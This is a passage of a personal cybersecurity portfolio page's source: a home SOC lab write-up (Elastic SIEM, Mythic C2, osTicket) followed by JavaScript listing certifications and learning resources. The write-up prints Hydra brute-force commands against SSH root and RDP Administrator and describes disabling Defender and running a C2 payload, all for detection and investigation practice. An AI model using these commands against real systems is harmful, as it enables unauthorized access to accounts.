mt-6">Network Architecture</div><p class="leading-relaxed mb-6">I designed the network architecture using draw.io. The environment consisted of an Elastic server, Kibana, Fleet Server, Windows and Linux target machines, a Mythic server, an attacker machine, and a SOC analyst workstation. The Elastic server served as the central logging and monitoring platform, while Fleet Server managed the endpoint agents responsible for forwarding telemetry. Mythic was used to simulate C2 activity, and osTicket handled incident tickets generated from Elastic alerts.</p><img src="./img/01.png" alt="Network Architecture" class="w-full h-auto rounded-xl border border-gray-200 dark:border-slate-700 shadow-sm my-8"><div class="font-bold text-lg text-gray-900 dark:text-white mb-2 mt-6">Infrastructure Deployment</div><ul class="space-y-6 mb-6 list-none dark:text-gray-300"><li class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300"><div class="font-semibold mb-2">Elastic Server and Kibana</div><ul class="list-disc pl-5 space-y-1 text-sm text-gray-600 dark:text-gray-400"><li>Deployed an Ubuntu server within a cloud Virtual Private Cloud (VPC) with firewall controls.</li><li>Installed and configured Elasticsearch and Kibana.</li><li>Updated network and HTTP settings in the configuration files.</li><li>Enrolled Kibana with Elasticsearch and configured the required keystore settings for alerting.</li></ul></li><li class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300"><div class="font-semibold mb-2">Windows and Linux Endpoints</div><ul class="list-disc pl-5 space-y-1 text-sm text-gray-600 dark:text-gray-400"><li>Deployed Windows and Linux target machines.</li><li>Installed Sysmon on Windows to collect detailed process and security telemetry.</li></ul></li><li class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300"><div class="font-semibold mb-2">Fleet Server and Agents</div><ul class="list-disc pl-5 space-y-1 text-sm text-gray-600 dark:text-gray-400"><li>Deployed a dedicated Ubuntu server as Fleet Server.</li><li>Installed and configured Windows and Linux agents.</li><li>Centralized endpoint logs within Elastic for monitoring and investigation.</li></ul></li><li class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300"><div class="font-semibold mb-2">Mythic C2 Server</div><ul class="list-disc pl-5 space-y-1 text-sm text-gray-600 dark:text-gray-400"><li>Deployed an Ubuntu server and installed Mythic using Docker.</li><li>Configured an agent and C2 profile to simulate communication with the Windows target over HTTP.</li></ul></li><li class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300"><div class="font-semibold mb-2">osTicket Integration</div><ul class="list-disc pl-5 space-y-1 text-sm text-gray-600 dark:text-gray-400"><li>Hosted osTicket on a Windows machine using XAMPP and Apache.</li><li>Configured MySQL to store ticket information.</li><li>Integrated Elastic with osTicket through a webhook connector and API key, enabling alerts to generate incident tickets automatically.</li></ul></li></ul><div class="font-bold text-lg text-gray-900 dark:text-white mb-2 mt-6">Lab Environment</div><p class="leading-relaxed">The completed environment included the following machines as can be seen in above image:</p><img src="./img/02.png" alt="File Type Command Output" class="w-full h-auto rounded-xl border border-gray-200 dark:border-slate-700 shadow-sm my-8"><img src="./img/03.png" alt="File Type Command Output" class="w-full h-auto rounded-xl border border-gray-200 dark:border-slate-700 shadow-sm my-8"></div><div><h2 class="text-2xl sm:text-3xl font-bold text-gray-900 dark:text-white mb-6">Brute-Force Attack Simulation</h2><div class="font-bold text-lg text-gray-900 dark:text-white mb-2">Objective</div><p class="leading-relaxed mb-6">The purpose of this exercise was to simulate unauthorized login attempts against Windows and Linux systems, analyze the resulting security telemetry, and practice investigating and responding to potential account compromise.</p><div class="font-bold text-lg text-gray-900 dark:text-white mb-2 mt-6">Detection Configuration</div><p class="leading-relaxed mb-2">I configured Elastic detection rules to generate alerts for failed authentication attempts involving:</p><ul class="list-disc pl-5 mb-6 text-gray-600 dark:text-gray-400 space-y-1"><li><strong class="text-gray-800 dark:text-gray-200">Windows:</strong> Administrator account over RDP (TCP 3389).</li><li><strong class="text-gray-800 dark:text-gray-200">Linux:</strong> Root account over SSH (TCP 22).</li></ul><div class="font-bold text-lg text-gray-900 dark:text-white mb-2 mt-6">Attack Simulation</div><p class="leading-relaxed mb-4">Hydra was used to simulate password-guessing attacks against both endpoints.</p><div class="font-semibold text-gray-800 dark:text-gray-200 mb-2">Linux — SSH</div><div class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300"><span class="text-brand-400">hydra</span> -l root -P rockyou.txt ssh://{{target_ip}}</div><div class="font-semibold text-gray-800 dark:text-gray-200 mb-2 mt-4">Windows — RDP</div><div class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300"><span class="text-brand-400">hydra</span> -l Administrator -P rockyou.txt rdp://{{target_ip}}</div><div class="font-bold text-lg text-gray-900 dark:text-white mb-2 mt-6">Investigation and Response</div><p class="leading-relaxed mb-4">After generating the attacks, I investigated the alerts and reviewed authentication logs to determine whether any attempts resulted in successful access. The investigation included:</p><ul class="list-disc pl-5 mb-6 text-gray-600 dark:text-gray-400 space-y-1"><li>Reviewing failed authentication attempts in Elastic.</li><li>Checking Windows Event ID 4624 and Linux successful SSH authentication events for evidence of unauthorized access.</li><li>Cross-referencing suspicious IP addresses with AbuseIPDB and GreyNoise for additional threat intelligence.</li><li>Identifying successful logons from unfamiliar IP addresses.</li><li>Blocking suspicious IP addresses using firewall rules.</li><li>Resetting the passwords of potentially compromised accounts.</li></ul><div class="font-bold text-lg text-gray-900 dark:text-white mb-2 mt-6">Key Takeaways</div><ul class="list-disc pl-5 mb-6 text-gray-600 dark:text-gray-400 space-y-1"><li>Restrict unnecessary services and close unused ports to reduce the attack surface.</li><li>Use strong, unique passwords and consider passkeys, passphrases, and multifactor authentication.</li><li>Monitor failed and successful authentication events together to identify possible account compromise.</li><li>Combine SIEM alerts with threat intelligence and firewall controls to support effective incident response.</li></ul></div><div><h2 class="text-2xl sm:text-3xl font-bold text-gray-900 dark:text-white mb-6">C2 Operation and Data Exfiltration Investigation</h2><div class="font-bold text-lg text-gray-900 dark:text-white mb-2">Objective</div><p class="leading-relaxed mb-6">This exercise simulated a compromised Windows endpoint where an attacker obtained credentials, disabled endpoint protection, executed a C2 payload, and attempted to exfiltrate sensitive information. The objective was to investigate the activity through endpoint telemetry, identify suspicious behavior, and respond using a ticket-based workflow.</p><div class="font-bold text-lg text-gray-900 dark:text-white mb-2 mt-6">Detection Configuration</div><p class="leading-relaxed mb-2">I configured Elastic detection rules to:</p><ul class="list-disc pl-5 mb-6 text-gray-600 dark:text-gray-400 space-y-1"><li>Detect unsuccessful logon activity and generate osTicket tickets.</li><li>Detect the disabling of Windows Defender real-time protection and generate an incident ticket.</li></ul><div class="font-bold text-lg text-gray-900 dark:text-white mb-2 mt-6">Attack Scenario</div><p class="leading-relaxed mb-4">The simulated attack followed this sequence:</p><div class="mb-4"><strong class="text-gray-800 dark:text-gray-200 block mb-2">1. Credential discovery: Used Hydra to perform brute-force attempts against the Windows RDP service.</strong><div class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300"><span class="text-brand-400">hydra</span> -l Administrator -P rockyou.txt rdp://{{target_ip}}</div></div><div class="mb-4"><strong class="text-gray-800 dark:text-gray-200 block mb-2">2. Remote access: Connected to the Windows machine using xfreerdp after obtaining credentials.</strong><div class="bg-gray-100 dark:bg-slate-800 p-4 rounded-md border border-gray-200 dark:border-slate-700 font-mono text-sm mb-4 overflow-x-auto text-gray-800 dark:text-gray-300"><span class="text-brand-400">xfreerdp</span> /v:{{target_ip}} /u:{{username}} /p:{{password}}</div></div><ul class="list-none space-y-2 mb-6 text-gray-600 dark:text-gray-400"><li><strong class="text-gray-800 dark:text-gray-200">3. Security control modification:</strong> Disabled Windows Defender real-time protection on the target machine.</li><li><strong class="text-gray-800 dark:text-gray-200">4. Payload execution:</strong> Downloaded and executed a payload generated through Mythic to establish a C2 connection.</li><li><strong class="text-gray-800 dark:text-gray-200">5. Data exfiltration:</strong> Simulated the extraction of credential information from the compromised endpoint.</li></ul><div class="font-bold text-lg text-gray-900 dark:text-white mb-2 mt-6">SOC Investigation</div><p class="leading-relaxed mb-4">An incident ticket was automatically generated and assigned for investigation. I began by reviewing the events surrounding the time Windows Defender real-time protection was disabled. The investigation revealed several important indicators:</p><ul class="list-disc pl-5 mb-4 text-gray-600 dark:text-gray-400 space-y-2"><li>Multiple failed logon attempts originating from the same IP address before a successful authentication.</li><li>Execution of discovery commands such as ipconfig, whoami, and netstat, which correspond to reconnaissance and discovery activities within the MITRE ATT&CK framework.</li><li>Execution of a suspicious payload identified as Apollo, associated with the Mythic C2 environment.</li><li>Evidence of endpoint security controls being disabled before further suspicious activity.</li></ul><p class="leading-relaxed mb-6">To improve investigation efficiency, I used the process GUID to correlate events belonging to the same process execution session. This helped trace related activity across the endpoint logs.</p><div class="font-bold text-lg text-gray-900 dark:text-white mb-2 mt-6">Investigation Limitations</div><p class="leading-relaxed mb-6">The lab primarily collected endpoint telemetry and did not include dedicated network monitoring. As a result, I could identify suspicious payload execution and related endpoint activity, but I could not directly observe the confidential files being transmitted over the C2 channel. This highlighted the importance of combining endpoint telemetry with network visibility when investigating data exfiltration.</p><div class="font-bold text-lg text-gray-900 dark:text-white mb-2 mt-6">Key Takeaways</div><ul class="list-disc pl-5 mb-6 text-gray-600 dark:text-gray-400 space-y-1"><li>Correlating authentication events with endpoint activity can help identify compromised accounts.</li><li>Disabling endpoint protection is a significant indicator of potentially malicious activity.</li><li>Process GUIDs can improve the accuracy and efficiency of event correlation.</li><li>Network telemetry is essential for validating outbound C2 communications and investigating data exfiltration.</li><li>Restricting unnecessary outbound connections and monitoring unusual data transfers can strengthen defensive capabilities.</li><li>Payloads delivered through social engineering or other attack vectors can enable attackers to establish persistence or C2 communications after execution.</li></ul></div><div><h2 class="text-2xl sm:text-3xl font-bold text-gray-900 dark:text-white mb-6">Conclusion</h2><p class="leading-relaxed mb-4 text-base">Building this SOC lab provided invaluable hands-on experience in threat detection, SIEM implementation, and incident response. By actively simulating attacks and analyzing logs across Windows and Linux systems, it sharpened my ability to identify vulnerabilities in common network protocols and reconstruct complex attack sequences. Ultimately, this project reinforces that effective enterprise security relies on three core pillars: centralized monitoring, layered defenses, and decisive incident response.</p></div>`},



        ];

        const certData = {
            'sc-300': { title: 'Microsoft Certified: Identity and Access Administrator Associate', issuer: 'Microsoft', credentials: 'https://learn.microsoft.com/en-us/users/rabi-0963/credentials/dd96e7922998576c', skills: ['Microsoft Entra ID Identity & Access Management', 'Authentication, MFA & Conditional Access', 'Application & Workload Identity Management', 'Identity Governance & Privileged Access'], imgSrc: './assets/badges/microsoft.png' },
            'sc-401': { title: 'Microsoft Certified: Information Security Administrator Associate', issuer: 'Microsoft', credentials: 'https://learn.microsoft.com/en-us/users/rabi-0963/credentials/bc49dab54f778bce', skills: ['Microsoft Purview Information Protection & Data Classification', 'Data Loss Prevention & Information Lifecycle Management', 'Insider Risk Management, Compliance Monitoring & AI Data Protection'], imgSrc: './assets/badges/microsoft.png' },
            'sec+': { title: 'CompTIA Security+', issuer: 'CompTIA', credentials: 'https://www.credly.com/badges/2a76c6b0-145e-42f2-b522-72fb3753ec63/public_url', skills: ['Threat & Vulnerability Management','Security Architecture & Operations','Identity & Access Management','Risk, Governance & Incident Response','Cryptography & Data Protection'], imgSrc: './assets/badges/comptia.png' },
            'sc-200': { title: 'Microsoft Certified: Security Operations Analyst Associate', issuer: 'Microsoft', credentials: 'https://learn.microsoft.com/en-us/users/rabi-0963/credentials/fd4955da51affc20', skills: ['Microsoft Defender XDR and Microsoft Sentinel Security Operations', 'Security Incident Response and Threat Investigation', 'Threat Hunting and Detection Engineering'], imgSrc: './assets/badges/microsoft.png' },
            'isc2cc': { title: 'ISC2 Certified in Cybersecurity', issuer: 'ISC2', credentials: 'https://www.credly.com/badges/27f98a2d-27df-4d27-abd9-2fa13fd7ab90/public_url', skills: ['Security Principles & Risk Management','Identity & Access Management', 'Network & Cloud Security','Security Operations & Incident Response'], imgSrc: './assets/badges/isc2.png' }
        };


        const ctiData = [
            { id: 1, title: 'CISA Cyber Activity & Advisories', tags: ['Advisory','Government'], summary: 'Official alerts and advisories concerning current cyber threats, vulnerabilities, and defensive mitigations.', link: 'https://www.cisa.gov/news-events/cybersecurity-advisories' },
            { id: 2, title: 'Krebs on Security', tags: ['News'], summary: 'In-depth investigative journalism focused on cybercrime, data breaches, and corporate security investigations.', link: 'https://krebsonsecurity.com/' },
            { id: 3, title: 'The Hacker News', tags: ['Insights','News'], summary: 'Leading trusted source for latest cybersecurity news, vulnerability disclosures, and exploit analysis.', link: 'https://thehackernews.com/' },
            { id: 4, title: 'Dark Reading', tags: ['Insights','News'], summary: 'Comprehensive security news and technical insights focusing on threat intelligence, analytics, and risk management.', link: 'https://www.darkreading.com/' },
            { id: 5, title: 'BleepingComputer', tags: ['Insights','News'], summary: 'Reliable technical news covering malware analysis, ransomware trends, and software security patches.', link: 'https://www.bleepingcomputer.com/' },
            { id: 6, title: 'SecurityWeek',  tags: ['Insights','News'], summary: 'Industry intelligence, enterprise risk assessments, and cyber defense strategy breakdowns.', link: 'https://www.securityweek.com/' },
            { id: 7, title: 'SANS Internet Storm Center', tags: ['Advisory','Insights','Podcasts'], summary: 'Daily analysis of malicious Internet traffic, vulnerabilities, and emerging threat vectors.', link: 'https://isc.sans.edu/' },
            { id: 8, title: 'The Record', tags: ['Insights','News','Podcasts'], summary: 'Award-winning cybersecurity journalism uncovering major global cyber incidents and geopolitical threats.', link: 'https://therecord.media/' },
            { id: 9, title: 'CSO', tags: ['Insights','News'], summary: 'Cybersecurity news, expert insights, and analysis to help security leaders navigate evolving threats.', link: 'https://www.csoonline.com/' },
            { id: 10, title: 'Ultimate IT Security',  tags: ['Advisory'], summary: 'Get informed about updates on Windows CVEs', link: 'https://www.ultimatewindowssecurity.com/' },
            { id: 11, title: 'RansomwareLive', tags: ['Ransomware'], summary: 'Real-time ransomware intelligence tracking groups, victims, and emerging threats worldwide.', link: 'https://www.ransomware.live/' },
            { id: 12, title: 'Paloalto Unit 42', tags: ['Insights'], summary: 'Expert cybersecurity research, threat intelligence, and incident response reports', link: 'https://unit42.paloaltonetworks.com/category/threat-research/' },
            { id: 13, title: 'CISO Series', tags: ['Insights','News', 'Podcasts'], summary: 'Featured podcasts, live events, and expert conversations for security professionals.', link: 'https://cisoseries.com/' }
        ];

        const communityData = [
            { id: 1, title: 'OWASP Foundation', label: 'Open Source', tags: ['AppSec', 'Framework'], type: 'Project', description: 'Open Worldwide Application Security Project driving secure software standards.', link: 'https://owasp.org/' },
            { id: 2, title: 'DEF CON Groups', label: 'Local Chapters', tags: ['Conferences','Networking'], type: 'Meetup', description: 'Community-driven local chapters meeting globally for hacking discussions and CTFs.', link: 'https://defcon.org/' },
            { id: 3, title: 'Blue Team Village', label: 'Blue Team', tags: ['CTFs'], type: 'Mentorship', description: 'Community dedicated to education, defense strategies, and blue team professional growth.', link: 'https://blueteamvillage.org/' },
            { id: 4, title: 'Nullcon Community', label: 'Global', tags: ['CTFs'], type: 'Research', description: 'Security community dedicated to exchanging cutting-edge security research and hacking techniques.', link: 'https://nullcon.net/' },
            { id: 5, title: 'BSides Chapters', label: 'Local Chapters', tags: ['Conferences', 'Networking'], type: 'Meetup', description: 'Community-driven framework for building security conferences around the globe.', link: 'http://www.securitybsides.org/' },
            { id: 6, title: 'Women in Cybersecurity (WiCyS)', label: 'Global', tags: ['Networking'], type: 'Mentorship', description: 'Alliance dedicated to recruiting, retaining and advancing women in cybersecurity fields.', link: 'https://www.wicys.org/' },
            { id: 7, title: 'Simply Cyber', label: 'Blue Team', tags: ['Networking','Podcasts','Webcasts'], type: 'Mentorship', description: 'Actionable cybersecurity intelligence, expert mentorship, and career-building resources', link: 'https://www.simplycyber.io/' },
            { id: 8, title: 'Black Hills Information Security', label: 'Professional', tags: ['Conferences','Networking','Webcasts'], type: 'Mentorship', description: 'Hands-on cybersecurity training, threat intelligence, and expert insights', link: 'https://www.blackhillsinfosec.com/' },
            { id: 9, title: 'MYDFIR', label: 'Blue Team', tags: ['CTFs','Networking'], type: 'Mentorship', description: 'Hands-on SOC training with real alerts, investigations, expert feedback', link: 'https://www.mydfir.com/' }
        ];

        const learningData = [
            { id: 1, title: 'TryHackMe', type: 'Beginner', tags: ['AppSec','CTFs','OffSec','SecOps'], kind: 'Interactive', description: 'Hands-on rooms covering Blue Team and Red Team concepts.', link: 'https://tryhackme.com/' },
            { id: 2, title: 'Microsoft Learn', type: 'Intermediate', tags: ['Documentation','Engineering'], kind: 'Documentation', description: 'Official guides to get faimiliar with Microsoft toolsets.', link: 'https://learn.microsoft.com/en-us/' },
            { id: 3, title: 'SANS Cyber Aces', type: 'Beginner', tags: ['Fundamentals'], kind: 'Video/Text', description: 'Free online courses teaching the core concepts of cybersecurity and networking.', link: 'https://www.sans.org/cyberaces' },
            { id: 4, title: 'HackTheBox', type: 'Intermediate', tags: ['AppSec','CTFs','OffSec', 'SecOps'], kind: 'Interactive', description: 'Deep dive into penetration testing and advanced exploitation techniques.', link: 'https://www.hackthebox.com/' },
            { id: 5, title: 'NIST Cybersecurity Framework', type: 'Intermediate', tags: ['GRC'], kind: 'Standards', description: 'Standards, guidelines, and best practices to manage cybersecurity risk.', link: 'https://www.nist.gov/cyberframework' },
            { id: 6, title: 'PortSwigger Web Security Academy', type: 'Advanced', tags: ['AppSec'], kind: 'Interactive', description: 'Free online web security training by the creators of Burp Suite.', link: 'https://portswigger.net/web-security/learning-paths' },
            { id: 7, title: 'Cisco Networking Academy', type: 'Beginner', tags: ['Fundamentals', 'SecOps'], kind: 'Video/Text', description: 'Introductory courses on networking essentials, packet analysis, and security principles.', link: 'https://www.netacad.com/catalogs/learn/cybersecurity' },
            { id: 8, title: 'GRC Playground', type: 'Beginner', tags: ['GRC'], kind: 'Interactive', description: 'Real governance skills through mission-based learning in system analysis, policy writing, evidence review, and authorization decisions', link: 'https://www.grcplayground.com/' },
            { id: 9, title: 'Forage', type: 'Beginner', tags: ['Internship'], kind: 'Simulation', description: 'Gain real-world experience through hundreds of free job simulations from top employers.', link: 'https://www.theforage.com/' },
            { id: 9, title: 'Hack Smarter', type: 'Intermediate', tags: ['OffSec'], kind: 'Interactive', description: 'Curated learning paths featuring realistic hacking labs and hands-on courses.', link: 'https://www.hacksmarter.org/paths' },
            { id: 10, title: 'KC7 Cyber', type: 'Intermediate', tags: ['SecOps'], kind: 'Interactive', description: 'Explore cybersecurity through real-world threat-hunting games', link: 'https://kc7cyber.com/' },
            { id: 11, title: 'PwnCollege', type: 'Beginner', tags: ['Fundamentals','OffSec','SecOps'], kind: 'Interactive', description: 'Master cybersecurity through hands-on challenges in different security domains.', link: 'https://pwn.college/' },
            { id: 12, title: 'RedTeamLeaders', type: 'Beginner', tags: ['OffSec','SecOps'], kind: 'Video/Text', description: 'Curated courses to understand the security domain.', link: 'https://courses.redteamleaders.com/' },
            { id: 13, title: 'Antisyphon Training', type: 'Beginner', tags: ['OffSec','SecOps'], kind: 'Instructor-Led', description: 'Practical cybersecurity training through hands-on courses, real-world scenarios, and expert-led instruction.', link: 'https://www.antisyphontraining.com/' },
            { id: 14, title: 'CyLab Security Academy', type: 'Beginner', tags: ['CTFs','SecOps'], kind: 'Interactive', description: 'Free cybersecurity education program featuring hands-on Capture the Flag challenges.', link: 'https://cylabacademy.org/' },
            { id: 15, title: 'SkillBit', type: 'Intermediate', tags: ['CTFs', 'SecOps'], kind: 'Interactive', description: 'Hands-on cybersecurity learning with CTF challenges, interactive labs and guided modules.', link: 'https://skillbit.com/' }
        ];

        // Cached DOM Elements
        const modal = document.getElementById('cert-modal');
        const modalPanel = document.getElementById('modal-panel');
        const certTrack = document.getElementById('cert-track');
        const modalTitle = document.getElementById('modal-title');
        const modalIssuer = document.getElementById('modal-issuer');
        const modalCredential = document.getElementById('modal-credentials');
        const modalIcon = document.getElementById('modal-icon');
        const modalList = document.getElementById('modal-list');

        function openModal(certId) {
            const data = certData[certId];
            if (!data) return;

            modalTitle.textContent = data.title;
            modalIssuer.textContent = data.issuer;
            modalCredential.href = data.credentials;
            modalIcon.src = `${data.imgSrc}`;
            
            const fragment = document.createDocumentFragment();
            data.skills.forEach(task => {
                const li = document.createElement('li');
                li.textContent = task;
                fragment.appendChild(li);
            });
            modalList.innerHTML = '';
            modalList.appendChild(fragment);
            
            modal.classList.remove('hidden');
            setTimeout(() => {
                modal.classList.remove('opacity-0');
                modalPanel.classList.remove('translate-y-4', 'opacity-0');
                modalPanel.classList.add('translate-y-0', 'opacity-100');
            }, 10);
            document.body.style.overflow = 'hidden';
        }

        function closeModal() {
            modal.classList.add('opacity-0');
            modalPanel.classList.remove('translate-y-0', 'opacity-100');
            modalPanel.classList.add('translate-y-4', 'opacity-0');
            setTimeout(() => {
                modal.classList.add('hidden');
                document.body.style.overflow = 'auto';
            }, 300);
        }


    // Theme Toggle Optimization
        const themeToggleBtn = document.getElementById('theme-toggle');
        const darkIcon = document.getElementById('theme-toggle-dark-icon');
        const lightIcon = document.getElementById('theme-toggle-light-icon');

        if (themeToggleBtn && darkIcon && lightIcon) {
            const isDark = localStorage.getItem('color-theme') === 'dark' || 
                         (!('color-theme' in localStorage) && window.matchMedia('(prefers-color-scheme: dark)').matches);
            
            document.documentElement.classList.toggle('dark', isDark);
            lightIcon.classList.toggle('hidden', !isDark);
            darkIcon.classList.toggle('hidden', isDark);

            themeToggleBtn.addEventListener('click', () => {
                darkIcon.classList.toggle('hidden');
                lightIcon.classList.toggle('hidden');
                const willBeDark = document.documentElement.classList.toggle('dark');
                localStorage.setItem('color-theme', willBeDark ? 'dark' : 'light');
            });
        }

         // Mobile Menu
        const mobileBtn = document.getElementById('mobile-menu-btn');
        const mobileMenu = document.getElementById('mobile-menu');
        if(mobileBtn && mobileMenu) {
            mobileBtn.addEventListener('click', () => mobileMenu.classList.toggle('hidden'));
            document.querySelectorAll('#mobile-menu a').forEach(link => {
                link.addEventListener('click', () => mobileMenu.classList.add('hidden'));
            });
        }

        // Optimized Scroll Observer
        const revealObserver = new IntersectionObserver((entries, observer) => {
            entries.forEach(entry => {
                if (entry.isIntersecting) {
                    entry.target.classList.add('active');
                    observer.unobserve(entry.target);
                }
            });
        }, { rootMargin: '0px 0px -50px 0px', threshold: 0.1 });

        document.querySelectorAll('.reveal').forEach(el => revealObserver.observe(el));

        document.getElementById('year').textContent = new Date().getFullYear();

        // Certification Tracking
        function evaluateCertStatuses() {
            const currentDate = new Date();
            document.querySelectorAll('.cert-status').forEach(el => {
                const expiryDate = new Date(el.getAttribute('data-expiry'));
                if (expiryDate > currentDate) {
                    el.innerHTML = '<span class="px-2 py-1 text-[10px] font-bold uppercase tracking-wider bg-emerald-100 text-emerald-700 dark:bg-emerald-900/30 dark:text-emerald-400 rounded-full border border-emerald-200 dark:border-emerald-800/50 shadow-sm">Active</span>';
                } else {
                    el.innerHTML = '<span class="px-2 py-1 text-[10px] font-bold uppercase tracking-wider bg-gray-100 text-gray-500 dark:bg-slate-700 dark:text-gray-400 rounded-full border border-gray-200 dark:border-slate-600 shadow-sm">Inactive</span>';
                }
            });
        }
        evaluateCertStatuses();

        let currentCertIndex = 0;
        function slideCert(direction) {
            if (!certTrack) return;
            const visibleItems = window.innerWidth >= 640 ? 3 : 1;
            const maxIndex = certTrack.children.length - visibleItems;
            
            currentCertIndex += direction;
            if (currentCertIndex < 0) currentCertIndex = maxIndex;
            if (currentCertIndex > maxIndex) currentCertIndex = 0;
            
            const offset = window.innerWidth >= 640 ? currentCertIndex * (101 / visibleItems): currentCertIndex * (105.5 / visibleItems);
            certTrack.style.transform =`translateX(-${offset}%)`;
        }

        // Optimized List Manager Component
        class ListManager {
            constructor(config) {
                this.data = config.data;
                this.container = document.getElementById(config.containerId);
                this.paginationContainer = document.getElementById(config.paginationId);
                this.renderItem = config.renderItem;
                this.itemsPerPage = config.itemsPerPage || 6;
                this.currentPage = 1;
                this.currentTypeFilter = 'all';
                this.currentTagFilter = 'all';
                this.currentSort = config.defaultSort || 'newest';
                this.init();
            }

            init() {
                if (this.container) this.update();
            }

            setFilters(type, tag, sort) {
                if(type !== undefined) this.currentTypeFilter = type;
                if(tag !== undefined) this.currentTagFilter = tag;
                if(sort !== undefined) this.currentSort = sort;
                this.currentPage = 1;
                this.update();
            }

            setPage(page) {
                this.currentPage = page;
                this.update();
                if (this.container?.parentElement) {
                    this.container.parentElement.scrollIntoView({ behavior: 'smooth', block: 'start' });
                }
            }

            update() {
                if (!this.container) return;
                
                let filtered = this.data.filter(item => 
                    (this.currentTypeFilter === 'all' || item.type === this.currentTypeFilter) &&
                    (this.currentTagFilter === 'all' || item.tags.includes(this.currentTagFilter))
                );

                filtered.sort((a, b) => {
                    if (this.currentSort === 'newest') return new Date(b.date || 0) - new Date(a.date || 0);
                    if (this.currentSort === 'oldest') return new Date(a.date || 0) - new Date(b.date || 0);
                    if (this.currentSort === 'az') return a.title.localeCompare(b.title);
                    if (this.currentSort === 'za') return b.title.localeCompare(a.title);
                    return 0;
                });

                const totalPages = Math.ceil(filtered.length / this.itemsPerPage);
                if (this.currentPage > totalPages && totalPages > 0) this.currentPage = totalPages;
                
                const start = (this.currentPage - 1) * this.itemsPerPage;
                const paginated = filtered.slice(start, start + this.itemsPerPage);

                this.container.innerHTML = '';
                
                if (paginated.length === 0) {
                    this.container.innerHTML = '<div class="col-span-full text-center text-gray-500 dark:text-gray-400 py-12 bg-white dark:bg-slate-800 rounded-xl border border-gray-200 dark:border-slate-700">No items found matching the selected criteria.</div>';
                } else {
                    const fragment = document.createDocumentFragment();
                    const temp = document.createElement('div');
                    
                    paginated.forEach((item, index) => {
                        temp.innerHTML = this.renderItem(item).trim();
                        const node = temp.firstChild;
                        if (node) {
                            node.classList.add('reveal', 'active');
                            node.style.animationDelay = `${index * 50}ms`;
                            fragment.appendChild(node);
                        }
                    });
                    this.container.appendChild(fragment);
                }

                if (this.paginationContainer) this.renderPagination(totalPages);
            }

            renderPagination(totalPages) {
                this.paginationContainer.innerHTML = '';
                if (totalPages <= 1) {
                    this.paginationContainer.style.display = 'none';
                    return;
                }
                this.paginationContainer.style.display = 'flex';

                const fragment = document.createDocumentFragment();
                const createBtn = (html, isDisabled, onClick, activeClass) => {
                    const btn = document.createElement('button');
                    btn.innerHTML = html;
                    if (activeClass) {
                        btn.className = 'w-10 h-10 flex items-center justify-center rounded-md bg-brand-500 text-white font-medium shadow-sm transition-transform hover:scale-105';
                    } else {
                        btn.className = `w-10 h-10 flex items-center justify-center rounded-md border ${isDisabled ? 'border-gray-200 text-gray-400 cursor-not-allowed dark:border-slate-700 dark:text-slate-600' : 'border-gray-300 text-gray-700 hover:bg-gray-50 dark:border-slate-600 dark:text-gray-300 dark:hover:bg-slate-700 hover:border-brand-500 dark:hover:border-brand-500'} font-medium transition-all`;
                        if(!isDisabled) btn.onclick = onClick;
                    }
                    btn.disabled = isDisabled;
                    return btn;
                };

                fragment.appendChild(createBtn('<i class="fa-solid fa-chevron-left"></i>', this.currentPage === 1, () => this.setPage(this.currentPage - 1)));
                for (let i = 1; i <= totalPages; i++) {
                    fragment.appendChild(createBtn(i, false, () => this.setPage(i), i === this.currentPage));
                }
                fragment.appendChild(createBtn('<i class="fa-solid fa-chevron-right"></i>', this.currentPage === totalPages, () => this.setPage(this.currentPage + 1)));
                this.paginationContainer.appendChild(fragment);
            }
        }

        // Rendering Functions
        const renderArticle = (item) => `
            <a href="${generateArticleUrl(item.title)}" class="block bg-white dark:bg-slate-800 rounded-xl overflow-hidden shadow-sm border border-gray-200 dark:border-slate-700 hover:shadow-lg hover:border-brand-500 dark:hover:border-brand-500 transition-all group h-full flex flex-col relative">
                <div class="absolute top-3 right-3 z-10">
                    <span class="px-2.5 py-1 text-[10px] font-bold uppercase tracking-wider bg-black/60 backdrop-blur-md text-white rounded-full shadow-sm">${item.type}</span>
                </div>
                <img src="${generateArticleUrl(item.title)}cover.jpeg" alt="Cover image" class="h-40 overflow-hidden object-cover w-full">
                <div class="p-6 flex flex-col flex-1">
                    <div class="flex flex-wrap gap-2 mb-3">
                        ${item.tags.map(tag => `<span class="px-2 py-1 text-xs font-medium bg-gray-100 text-gray-800 dark:bg-slate-700 dark:text-gray-300 rounded">${tag}</span>`).join('')}
                    </div>
                    <h3 class="text-xl font-bold mb-2 dark:text-white group-hover:text-brand-500 transition-colors">${item.title}</h3>
                    <p class="text-sm text-gray-600 dark:text-gray-400 mb-4 line-clamp-3 flex-1">${item.summary}</p>
                    <div class="flex justify-between items-center mt-auto border-t border-gray-100 dark:border-slate-700 pt-4">
                        <span class="text-xs text-gray-500 dark:text-gray-400 font-medium"><i class="fa-regular fa-calendar mr-1"></i> ${item.date}</span>
                        <div class="text-brand-500 font-medium text-sm flex items-center">
                            Read <i class="fa-solid fa-arrow-right ml-1 text-xs"></i>
                        </div>
                    </div>
                </div>
            </a>
        `;

        const renderCTI = (item) => `
